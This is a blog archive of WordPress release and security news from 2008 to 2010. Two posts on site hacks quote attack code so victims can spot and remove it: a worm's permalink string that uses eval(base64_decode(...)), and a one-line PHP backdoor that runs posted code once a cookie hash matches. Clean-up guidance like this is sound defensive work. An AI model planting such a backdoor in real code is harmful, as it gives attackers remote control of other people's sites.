WordPress 3.0 Beta 2

May 10, 2010 | No Comments Yet

The second beta of WordPress 3.0 was released May 6. This is a little behind schedule as the Release Candidates should be out by now.

Following the successful post-WordCamp San Francisco code sprint, we are now ready to release the second beta of WordPress 3.0.

The update focuses on improvements to the menu interface and the WordPress importer/exporter. Everyone is encouraged become a beta tester with the help of the beta tester plugin.

Download WordPress 3.0 Beta 2

Leave a Comment | Tags: , , , , , , ,

WordPress 3.0 Beta 1

April 3, 2010 | No Comments Yet

WordPress 3.0 is not far along now, here’s Beta 1! We’ve been covering the many features packed in this release but if you can’t wait, go ahead and take the early release for a spin.

As usual this is the first of the pre-releases before the final version comes out (in a month or so) which means take precautions when using it. If you’d like to help with development through testing, download WordPress 3.0 Beta 1 now.

Leave a Comment | Tags: , , , , ,

BuddyPress 1.2 installs on WordPress

February 17, 2010 | No Comments Yet

BuddyPress Test Drive site

The biggest roadblocks to adopting social network software BuddyPress have finally been eliminated. With the latest version 1.2 coming out, you can now install BuddyPress on WordPress and not just WordPress MU. That goes for any WP version. Consider this the official way to run BP following this one.

Another highlight of this release is a quicker, simpler installation process: just 3 steps detailed in the download page. Simply add BuddyPress from your plugins page and activate a theme for it.

Probably the most exciting part of this release is a new default theme, which you can see running on the official site and the BuddyPress Test Drive site. BP is looking cleaner and more flexible than ever—you can create child themes with BP too.

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.9.2

February 16, 2010 | 1 Comment

WordPress 2.9.2 fixes a bug that lets logged in users see trashed posts created by other authors. It’s not a very urgent update, only to whose who find the Trash bug an inconvenience, but it’s still wise to download the latest version whenever you can. This should give you ample time to backup first.

Haven’t used the new Trash feature before? Here’s a walkthrough on it and here’s how to customize it.

Leave a Comment | Tags: , , , , , ,

WordPress 2.9.1

January 5, 2010 | No Comments Yet

A beta and release candidate later, WordPress 2.9.1 is finally out. It addresses several issues including errors with cron, pingbacks, and scheduled posts. The entire list of fixes can be viewed here.

If you still have reservations about moving up to WP 2.9, this release should stabilize the upgrade now.

Download WordPress 2.9.1 or upgrade from within your admin panel. Interesting fact: WP 2.9 has passed one million downloads already!

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.9

December 19, 2009 | No Comments Yet

WordPress 2.9 is finally here! Just days after the first release candidate comes out, the final version of the much-awaited WordPress upgrade has arrived. Looks like Christmas came early this year.

WP 2.9 been dubbed “Carmen” after jazz vocalist Carmen McRae, and is the most feature-packed upgrade to date. The most popular mentioned are: the Trash, a built-in image editor, batch plugin updating and compatibility checking, and easier video embeds using oEmbed. The whole list is detailed in the Trac, of course.

Backup and upgrade now!

Leave a Comment | Tags: , , , , , , ,

WordPress upgrade notifications from Google Analytics?

December 1, 2009 | No Comments Yet

If you’ve been blogging for a while now you’ll know that Google Analytics is an indispensable part of your website, so perhaps it’s not surprising that the service has this new feature: software version notifications for your CMS.

One of the great things about working at Google is that we get to take advantage of an enormous amount of computing power to do some really cool things. One idea we tried out was to let webmasters know about their potentially hackable websites. […] This time, however, our goal is not just to isolate vulnerable or hackable software packages, but to also notify webmasters about newer versions of the software packages or plugins they’re running on their website. [..] This is where we think we can help. We hope to let webmasters know about new versions of their software by sending them a message via Webmaster Tools. This way they can make an informed decision about whether or not they would like to upgrade.

I’m not sure this is any better than installing a plugin such as Update Notifier that sends emails whenever your WP installation or WP plugins need updating. After all, it still depends on the generated version meta tag which both WordPress and hackers use to check.

The upside here, though, is that at least Google is now looking into ways they can help with website maintenance, particularly security. And not just for WordPress, but for all other content management systems out there. Both CMS developers and webmasters stand to gain from the knowledge and resources Google can spend on this.

In the meantime, keep your eyes peeled as this new feature will be rolling out “soon”.

(Via WPLover)

Leave a Comment | Tags: , , , , , ,

WordPress 2.9 Beta 1

November 17, 2009 | No Comments Yet

And the road to WordPress 2.9 begins. WP 2.9 beta 1 is out.

It’s also the best way to check out what’s new, but if you can’t be bothered with a mere beta version yet, at least take this as an early heads up that you’ll be upgrading soon enough. So get ready!

Leave a Comment | Tags: , , , , ,

WordPress 2.8.6

November 13, 2009 | No Comments Yet

WordPress 2.8.6 is another important security release that tackles vulnerabilities in the Press This bookmarklet and upload file names.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

Upgrade now!

Leave a Comment | Tags: , , , , , , ,

Upgrade multiple plugins at once in WordPress 2.9

October 31, 2009 | No Comments Yet

Here’s another new feature coming in WordPress 2.9 that will make maintaining your blog a lot easier. You can now upgrade multiple plugins that have updates available all at once. No need to go through them one at a time. A welcome improvement for WordPress sites of all sizes. Visit WP Engineer for a screenshot of the feature.

There are few details yet but it’s great that we’re getting news about all these new improvements to WordPress before it comes out, so we know what to expect.

(Via Weblog Tools Collection)

Leave a Comment | Tags: , , , , ,

WordPress 2.8.5

October 21, 2009 | No Comments Yet

WordPress has come out with yet another security upgrade (they call it a “hardening release”), notably in line with this trackback-related 0-day exploit.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The WordPress team also recommends users to install the WordPress Exploit Scanner plugin, which you can download here.

Leave a Comment | Tags: , , , , , ,

WordPress Plugin: Upgrade Notification by Email

September 8, 2009 | No Comments Yet

Upgrade Notification by Email does exactly what it is called: anytime WordPress sends out a new update, your blog administrator’s email inbox will receive a notice that you should upgrade. Now you have no excuse to install the latest, most secure version of WordPress on your website as soon as possible.

This plugin is for you if you don’t look inside of your Admin Panel every day (for example you have tens of wordpress installations) but still want to have wordpress up to date. After installation plugin will check every day if newer version of wordpress is available and if yes, will send email to blog’s admin with notification.

Download Upgrade Notification by Email

Leave a Comment | Tags: , , , , , ,

Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circling the WordPress community and it’s attacking all sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)

Leave a Comment | Tags: , , , , ,

WordPress 2.8.4

August 12, 2009 | No Comments Yet

As expected, Automattic promptly released WordPress 2.8.4, a security update to the previously mentioned remote admin password reset vulnerability.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Whether you’ve patched your WP installation as instructed or not, better grab this upgrade immediately. As always, backup before doing so!

Leave a Comment | Tags: , , , , , , , , ,

WordPress 2.8.3

August 4, 2009 | No Comments Yet

WordPress 2.8.3 just dropped last night. It fixes several security issues that were overlooked with the WP 2.8.1 release, pointed out by several members of the WordPress community. Don’t you love it when everybody helps out?

Download the latest version now or upgrade automatically from your admin panel.

Leave a Comment | Tags: , , , , , ,

WordPress 2.0.x now deprecated

July 30, 2009 | No Comments Yet

The WordPress development team is now ending support for the WordPress 2.0.x branch, just a few months earlier than the planned 2010 deprecation.

Many of the security improvements to the new versions of WordPress in the last couple of years were complete reworks of how various systems were handled. Porting those changes to the 2.0.x branch would have been a monumental task and could have introduced instability or new bugs. We had to make hard decisions between stability and merging in the latest security enhancements. Additionally, far fewer people stayed on the 2.0.x branch than we anticipated. I take that as a testament to the new features in WordPress and perhaps even more the features offered by plugins, many of which don’t support older versions of WordPress!

The good news is, there are way fewer people who have left their WordPress installations outdated than updated. If you’re part of that group, though, do the right thing and upgrade now! The advantages—both in features and security—far outweigh the disadvantages.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.8.2

July 20, 2009 | No Comments Yet

WordPress 2.8.2 is an important security update that addresses an XSS vulnerability with unsanitized comment author URLs. No betas or release candidates came out before this version, but upgrade away! The notice should already be up in your WordPress admin panel.

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.8.1 & WordPress MU 2.8.1

July 11, 2009 | No Comments Yet

The first official release since the big WordPress 2.8 is finally out. Highlights of the new features are listed in the announcement post, but you can also view the complete list here. Lots of fixed glitches, memory improvements, and improved security:

Core Security Technologies notified us that admin pages added by certain plugins could be viewed by unprivileged users, resulting in information being leaked. Not all plugins are vulnerable to this problem, but we advise upgrading to 2.8.1 to be safe.

WordPress MU also came out with version 2.8.1 a day after. Unlike WordPress, WPMU didn’t have a version 2.8, so this is a big update for all you multi-users out there (including BuddyPress). Download it now!

You can upgrade to WP 2.8.1 by downloading it at WordPress.org or by clicking “upgrade automatically” after following the notice in your administration panel.

Leave a Comment | Tags: , , , , , , , , , ,

WordPress 2.8.1 Beta 2

June 29, 2009 | No Comments Yet

The second beta of WordPress 2.8.1 is already out. This comes just days after the download counter for WordPress 2.8 crosses 1 million, just 12 days!

The list of bug fixes in this beta are mentioned here.

Download WordPress 2.8.1 Beta 2

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.8.1 Beta 1

June 22, 2009 | No Comments Yet

Almost two weeks after the big release comes the first beta of WordPress 2.8.1. The bug fixes are listed here, which includes memory fixes and added security.

Instructions for upgrading from WordPress 2.8 to WordPress 2.8.1 beta 1 can be found here. If you still haven’t upgraded to WordPress 2.8 and are more of a cautious user, you might want to wait until WP 2.8.1 comes out.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.8

June 11, 2009 | No Comments Yet

Six months after the release of the previous version comes WordPress 2.8 codename “Baker”, with the slogan “cool, smoother, simpler blogging”. Matt writes that the latest version is a nice fit and finish release for WordPress with improvements to themes, widgets, taxonomies, and overall speed:

  • Load pages, particularly styles and scripts, faster
  • Browse and install themes from the Theme Directory from the WordPress dashboard (just like plugins)
  • Edit theme and plugin code with syntax highlighting using the CodePress editor
  • Enjoy more user-friendly Widgets with a revamp of its interface
  • Use Screen Options to every page in the dashboard
  • And more!

Backup your database and files then hit “update now” in your dashboard. Don’t forget to check out the video above!

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.8 Release Candidate 1

June 8, 2009 | No Comments Yet

Almost there folks! WordPress 2.8 now has a release candidate available for download. Check out the changelog for a list of modifications since beta 2. It’s June 8 and only a couple of days left before the final version ships.

According to the announcement, “With Release Candidate 1, we think WordPress 2.8 is ready and complete.” Will you hold out until then, or grab this one anyway?

Leave a Comment | Tags: , , , , ,

WordPress 2.8 Beta 2

May 25, 2009 | No Comments Yet

WordPress 2.8 Beta 2 is out. You can check out the changes made since the first came out here. But as always, the Codex is your reference for the major changes since 2.7.

Download WordPress 2.8 beta 2

Leave a Comment | Tags: , , , , ,

WordPress 2.8 Beta 1

May 18, 2009 | No Comments Yet

WordPress 2.8 is coming! Technically, it’s already arrived with the release of this first beta. If you’ve been absolutely impatient about it, download away. If not, you can wait a few more days until it hits gold.

The latest features of WordPress 2.8 are documented here. Lots of admin improvements and hopefully, few additional features that will break existing themes and plugins.

Download WordPress 2.8 beta 1

Leave a Comment | Tags: , , , , ,

Update multiple WordPress blogs with a Subversion bash script

February 26, 2009 | No Comments Yet

David Peralty of Devlounge details how to create a special script for updating your WordPress install if you’re using Subversion. Perfect for the power user running multiple WP blogs on his/her own server.

Now this might not mean much if you’re not familiar with Subversion, but David also points to another article of his that introduces you to it. If its abbreviation “SVN” sounds familiar, it’s probably because it’s the same updating and versioning system that Automattic uses for WordPress. Wouldn’t you like to learn how to use it as well?

And here’s WordPress.org’s page on SVN.

Leave a Comment | Tags: , , , , ,

WordPress 2.7.1

February 11, 2009 | No Comments Yet

As expected, the official release of WordPress 2.7.1 is now out. You should be getting a notification in the administration panel for you to upgrade, which you can do so either manually or automatically. You don’t even have to visit WordPress.org to get the download file. There’s a link under Tools > Upgrade.

You can check out the list of closed tickets and changed files for WP 2.7.1.

Leave a Comment | Tags: , , , ,

WordPress 2.7.1 RC1

February 9, 2009 | No Comments Yet

The first release candidate of WordPress 2.7.1 came out over the weekend. Weblog Tools Collection lists some of the fixes and improvements for your perusal. You can view the original announcement by Ryan Boren here.

Download WordPress 2.7.1.

Leave a Comment | Tags: , , , , , ,

WordPress 2.7.1 Beta 1

February 4, 2009 | No Comments Yet

The first maintenance release of WordPress 2.7 is imminent and you can get a beta copy today. Check out all the fixes here.

One interesting note here is if you wish to use the built-in automatic upgrade with the beta, this is what you have to do:

To automatically upgrade from 2.7 to 2.7.1 Beta 1, change the version in your wp-includes/version.php file from 2.7 to 2.7.1-beta and then visit Tools->Upgrade.

Of course you can always download WordPress 2.7.1 beta 1 and upgrade manually.

It’s exciting to see a new release since WP 2.7 dropped and I can’t wait to see what new features the developers are cooking up in the following updates.

Leave a Comment | Tags: , , , , , ,

WordPress 2.7

December 11, 2008 | No Comments Yet

It’s here! Just a day after release candidate 2 is announced, and months of eager anticipation from by the community, the final version of WordPress 2.7 “Coltrane” is now available for download. Be sure to watch this jazzy video tour (I love how they tied in the customizable features of WordPress to improvisational nature of jazz):

This WordPress release has been a much-awaited one with all its new features: a new look for the admin pages, customizable post panels, automatic upgrades, bulk editing, comment threading, sticky posts, Press This!, and more, giving you a blogging experience that’s flexible and fast.

Download WordPress 2.7 now!

Leave a Comment | Tags: , , , , , , , , ,

WordPress 2.7 Release Candidate 1

December 2, 2008 | 1 Comment

This is it, folks: the first release candidate of WordPress 2.7 is available for download. The new icons of the admin panel are in, and 280 commits have been made since WP 2.7 beta 3.

We’re one step closer to the final release of WP 2.7, and it’s only a matter of time.

Leave a Comment | Tags: , , , ,

WordPress 2.7 Beta 3

November 16, 2008 | No Comments Yet

Beta 3 of WordPress 2.7 is out! According to Word Munger, it was actually released live during WordCamp Charlotte. Read the list of changes here.

Leave a Comment | Tags: , , , , ,

WordPress 2.7 Beta 2

November 6, 2008 | 1 Comment

Just a few days after releasing the first beta, WordPress 2.7 Beta 2 is now out! Based on the announcement, it looks like bug fixes were the focus of this beta release.

And since you can automatically upgrade to the latest version of WordPress from within the admin panel, check it out:

If you have already installed beta 1, you can update to beta 2 via the Tools -> Update menu. Beta 1 does have a bug in the automatic upgrade that breaks certain setups, so be prepared to download and install Beta 2 manually if you experience problems.

Keep this in mind even if you haven’t installed the beta yet, but plan to upgrade to WP 2.7 in the future.

Leave a Comment | Tags: , , , , , ,

WordPress 2.7 Beta 1

November 2, 2008 | No Comments Yet

The first beta of the much-awaited WordPress 2.7 version is out! Prepare for a completely revamped admin interface and all the new features we’ve been raving about the past few months.

Several things to note: WP 2.7 Beta 1 works best in Firefox and Safari (for now). And the final WP 2.7 release is 2 weeks behind schedule.

The downside is more waiting; the upside is the team isn’t rushing to get it out but to polish it the best way possible. It’s slated for November 10th, and while the developers are still trying their best to get it done by that date, a release candidate should be out by then. End of November seems more like the WP 2.7 final release.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.6.3

October 24, 2008 | No Comments Yet

WordPress 2.6.3 provides a security fix for a vulnerability found in the Snoopy library, which according to the project page is a “PHP class that simulates a web browser”.

Since this is a security upgrade, it’s best that you download the latest version immediately. But since only 2 files were updated, i.e. wp-includes/class-snoopy.php and wp-includes/version.php, you can also just grab those and replace the ones on your server.

Leave a Comment | Tags: , , , , , , , ,

WordPress MU 2.6.2

October 1, 2008 | No Comments Yet

WordPress MU 2.6.2 is a required upgrade with several significant bug fixes, though no urgent security issues (unlike WordPress 2.6.2).

Download the latest version of WordPress MU here.

Leave a Comment | Tags: , , ,

WordPress.com users can go ad-free (for a fee)

September 19, 2008 | No Comments Yet

Matt Mullenweg has just announced at the WordPress.com blog that based on their experimentation with Google ads, they’ve decided to make displaying advertisements optional—but for a fee.

…Light advertising has allowed us to focus on free features for you guys rather than paid upgrades, and enabled us to invest in infrastructure so your blog is always fast and reliable and never shows a fail whale.


The No-ads upgrade can be purchased for 30 credits a year ($0.08 a day) through the Upgrades tab in your blog’s dashboard.

So that basically answers two things: (1) it costs a lot to keep things free so they’re running ads, though only at a reasonable amount; and (2) yes, you can finally remove them, though you’ll have to pay for it.

The next question would have to be: will WordPress.com users be able to make money for themselves by running their own ads? Matt says they’re thinking about it, though take note that it will probably a paid upgrade too.

Leave a Comment | Tags: , , , , , , ,

Early preview of WordPress 2.7

September 4, 2008 | No Comments Yet

Although WordPress is still a long way from being released, Weblog Tools Collection has posted several screenshots of WordPress 2.7 that reveal changes that improve upon the last major interface upgrade from WordPress 2.5. Here are some quotes from the blog post:

  • “There is now a left hand side navigational column.”
  • “The Write Panel in WordPress 2.7 has gone through an overhaul as well. I think you’ll really enjoy the fact that drag and drop elements are back.”
  • “Browsing and installing plugins from the respository looks to become even more convenient now that you can do both from the WordPress back end.”
  • “You can now configure a large image size, default image size, default image alignment, and default image links. Very nice, time saving options.”

Looks like another exciting release in the history of WordPress. Watch out for more developments at the WordPress Codex page dedicated to WordPress 2.7.

Leave a Comment | Tags: , , , ,

WordPress MU 2.6.1

September 4, 2008 | No Comments Yet

In coordination with the last official release of WordPress, WordPress MU 2.6.1 is out. Unlike WP 2.6.1, though, which is a maintenance release, WP MU 2.6.1 is required.

Download the latest version of WordPress MU here.

Leave a Comment | Tags: , , , , , ,

WordPress 2.6.1

August 16, 2008 | No Comments Yet

WordPress 2.6.1 is finally out. Here’s a nice tip if you’ve been wondering about when you should upgrade:

With 2.6.1, we’re continuing our trend of releasing a maintenance release shortly after a major release in order to get fixes for the inevitable “dot zero” bugs into your hands without a long wait. If you’re happy with 2.6, however, keep on using it. You need not upgrade to 2.6.1 if 2.6 is getting the job done.

If you’re an early adopter, you probably made the move to WP 2.6 already, and you may not have to upgrade immediately since this is not an urgent security release. If you haven’t, waiting for the “dot one” release ensures a lot more bug fixes than the “dot zero” release. Check out the the list of 60 bug fixes here.

Download WordPress 2.6.1 here.

Leave a Comment | Tags: , , , , ,

WordPress 2.6.1 Beta 2

August 13, 2008 | No Comments Yet

Beta 2 of WordPress 2.6.1 is out. The team is approaching 60 bugs fixed for the official 2.6.1 release. You can the new fixes since beta 1 here.

Grab WP 2.6.1-b2 here.

Leave a Comment | Tags: , , , , ,

WordPress 2.6.1 Beta 1

August 8, 2008 | No Comments Yet

WordPress 2.6.1 Beta 1 is out. You might want to grab it now, or wait until an official release arrives, which Ryan Boren says will arrive around the time of this year’s WordCamp San Francisco.

Here’s another tip from him:

With 2.6.1, we’re continuing our trend of releasing a dot one release about a month after dot zero. We want to get fixes for the inevitable dot zero bugs into your hands without a long wait. If you’re happy with 2.6, you can ignore 2.6.1.

There are over 50 fixes, a lot of which address the typos in code and major bugs—like the 404 error that turns up when your permalink structure is /index.php/%postname%/.

Leave a Comment | Tags: , , , , , , ,

WordPress MU 2.6

July 29, 2008 | No Comments Yet

WordPress multi-user or WPMU is now version 2.6, whose code was based on the standard WordPress 2.6 release. You’ll find similar new features like the return of the “Press This!” bookmarklet, Google Gears support, theme previews, and so on. Donncha O Caiomh has more details.

Download WordPress MU 2.6 here.

Leave a Comment | Tags: , , , , ,

WordPress 2.6 bugs and fixes

July 28, 2008 | 4 Comments

It’s only been a few days since the release of WordPress 2.6 and already we are hearing about some major bugs and problems. Whether you’ve upgraded already or not, it’s best to be aware of these issues so that you can address them immediately. Here are some of the major ones being discussed around the blogs:

Missing Categories

If you run a big blog with lots of categories, chances are your categories have mysteriously disappeared. David Cumps wrote a fix, which requires phpMyAdmin knowledge.

get_posts Not Working

If you have a custom theme that uses multiple loops, chances are it uses get_posts. Unfortunately there are several problems with the function in this version, so you might be better off using query_posts instead.

index.php Permalinks Not Working

If your permalink structure involves “index.php“, chances are your blog post links (but not your blog pages) are broken.

More stuff to be fixed in WordPress 2.6.1

Don’t forget that if you have custom themes and plugins installed, check first to see if they’re compatible with the latest version of WordPress before you start complaining. Then search for your problem first in the Support forum.

Visit the 2.6.1 roadmap for a detailed list of the bugs squashed. Also visit the WordPress Development Updates blog for up to the minute information from the WP team.

Leave a Comment | Tags: , , ,

WordPress 2.6

July 15, 2008 | No Comments Yet

After 3 betas and one release candidate, WordPress 2.6 “Tyner” is here. Automattic also put up a short video tour of the new version:

Discussed in the WP 2.6 announcement post are the highlighted features we’ve all been expecting for a few months now:

  • Post Revisions: Wiki-like tracking of edits
  • Press This!: Post from wherever you are on the web
  • Shift Gears: Turbo-speed your blogging
  • Theme Previews: See it before your audience does
  • and many other smaller features and improvements

Ryan Boren discusses in depth SSL and Cookies in WordPress 2.6, which I’m sure is the first of many blog posts to tackle the new stuff under the hood.

Leave a Comment | Tags: , , , , , ,

WordPress 2.6 Release Candidate 1

July 14, 2008 | No Comments Yet

The final version of WordPress 2.6 draws closer than ever as Release Candidate 1 is released.

According to Ryan Boren, here are the latest features included since beta version 3:

  • Media uploader and gallery improvements
  • Image caption and image editing fixes
  • Press This fixes
  • Ability to toggle between the flash uploader and a regular browser uploader
  • Notification bubble on the Plugins menu when plugin updates are available

The complete list of changes can, of course, be found in the WordPress Trac.

Download WP 2.6 RC1 here.

Leave a Comment | Tags: , , , , , ,

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Leave a Comment | Tags: , , , , , , ,

Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!

Leave a Comment | Tags: , , , , , ,

WordPress 2.5 Released

March 31, 2008 | 3 Comments

The long-awaited version of WordPress is finally here! WordPress 2.5 “Brecker” was released last March 29, and just about the same time the official WordPress website got a makeover to match the new administration panel.

2.5 is a major milestone for WordPress not because it added dozens of user-requested features, but because it reaffirms that we’re as passionate about blogging as the day we started. Our community is too fierce to rest on its laurels — contrary to what pundits claim, blogging is far from “finished” and every improvement just whets our appetite for more. And more is coming.

Version 2.5 had two release candidates before the final version and tons of discussions about its upcoming features, so those who have been keeping up-to-date probably already know what to expect. For those who don’t, better read it straight from the horse’s mouth. Here’s a shortlist:

User Features

  • Cleaner, faster, less cluttered dashboard
  • Dashboard Widgets
  • Multi-file upload with progress bar
  • EXIF extraction
  • Search posts and pages
  • Tag management
  • Password strength meter
  • Concurrent editing protection
  • Few-click plugin upgrades
  • Friendlier visual post editor
  • Built-in galleries

Developer Features

  • Salted passwords
  • Secure cookies
  • Easy taxonomy and URL creation
  • Inline documentation
  • Database optimization
  • $wpdb->prepare()
  • Media buttons
  • Shortcode API

Theme and plugin issues shouldn’t be too major, but to be sure just check out the Codex for that.

Download WordPress 2.5 now!

Leave a Comment | Tags: , , ,

WordPress 2.5 Delayed!

March 12, 2008 | No Comments Yet

Weblog Tools Collection reports that the much-awaited release of WordPress 2.5 has been delayed by a week. People have written countless posts about preparing for taking this major leap (especially since it skipped 2.4), while some are still hesitating.

According to the WordPress Trac, the WordPress team has reached only 58%, or closed 560 out of 966 tickets, so far. Here’s hoping there will be no more delays—or not, since you might be breathing a sigh of relief as you won’t have to scramble to update your site just yet.

WordPress 2.5 is now due on March 17, 2008.

Leave a Comment | Tags: , ,

WordPress 2.5 is Coming!

February 19, 2008 | 5 Comments

The WordPress community is buzzing about the WordPress 2.5 demo site, which is under heavy scrutiny, not to mention lots of malicious hackery. Still, it’s worth a look.

For those who don’t know, the developers are skipping WP 2.4 and heading straight to a version 2.5 release this March 10th. The Blog Herald has a great overview of all the things that need to be updated, be it themes or plugins, once WordPress 2.5 arrives. Of course, you can always check out the WordPress Codex page on the same topic.

Leave a Comment | Tags: , , , ,